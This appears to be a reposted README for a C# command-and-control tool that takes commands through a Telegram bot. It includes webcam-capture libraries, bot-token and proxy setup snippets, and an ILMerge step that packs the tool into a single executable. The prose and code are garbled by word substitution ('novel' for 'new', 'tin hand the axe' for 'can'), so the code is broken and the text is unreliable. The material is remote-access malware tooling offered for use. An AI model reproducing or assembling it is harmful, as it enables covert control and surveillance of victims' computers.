Telegram C# C2 - A Command As Well As Command Tool For Telegram Bot Communication

Command together with Control for C# Writing
Author: Leiothrix
Telegram: @Leiothrix
Twitter: @wh4am1
Team: QQ愛&Love


Nuget download these package
using System.IO; using Telegram.Bot; using Telegram.Bot.Args; using Telegram.Bot.Types.InputFiles; using AForge.Video; using AForge.Controls; using AForge.Video.DirectShow;

Add related classes inwards 'References'
System.Drawing; System.Windows.Forms;

How to used

Modify your Token to the program
 static void Main(){             botClient = novel TelegramBotClient("token");  //Your Token             botClient.OnMessage += Bot_OnMessage;             botClient.StartReceiving();             Thread.Sleep(int.MaxValue); }

have adept fun.


TelegramBotClient allows you lot to role a proxy for Bot API connections.


You tin hand the axe overstep an IWebProxy to bot customer for HTTP Proxies.
 // using System.Net;   var httpProxy = novel WebProxy("", 8080)  {       Credentials = novel NetworkCredential("USERNMAE", "PASSWORD")  };  var botClient = novel TelegramBotClient("YOUR_API_TOKEN", httpProxy);


You tin hand the axe role an external NuGet package: HttpToSocks5Proxy provided
// using MihaZupan;  var proxy = novel HttpToSocks5Proxy(Socks5ServerAddress, Socks5ServerPort);  // Or if you lot postulate credentials for your proxy server: var proxy = novel HttpToSocks5Proxy(   Socks5ServerAddress, Socks5ServerPort, "USERNAME", "PASSWORD" );  // Allows you lot to role proxies that are alone allowing connections to Telegram // Needed for around proxies proxy.ResolveHostnamesLocally = true;  var botClient = novel TelegramBotClient("YOUR_API_TOKEN", proxy);

How to compile

How to compile all DLL files into an EXE file

First,You postulate download ILMerge tool,this is a tool for merging all references to .NET programs.
ilmerge.exe /target:exe /out:TGbot.exe ConsoleApp1.exe  AForge.Controls.dll AForge.dll AForge.Imaging.dll AForge.Math.dll AForge.Video.DirectShow.dll AForge.Video.dll Newtonsoft.Json.dll Telegram.Bot.dll /targetplatform:v4

/target -> library=>DLL exe=>exe

/targetplatform:v4 -> Compiler platform is .net 4.0

/out -> Merged output file,Parameters are followed past times files that postulate to last merged
Finally, generate output inwards the directory specified past times the out parameter

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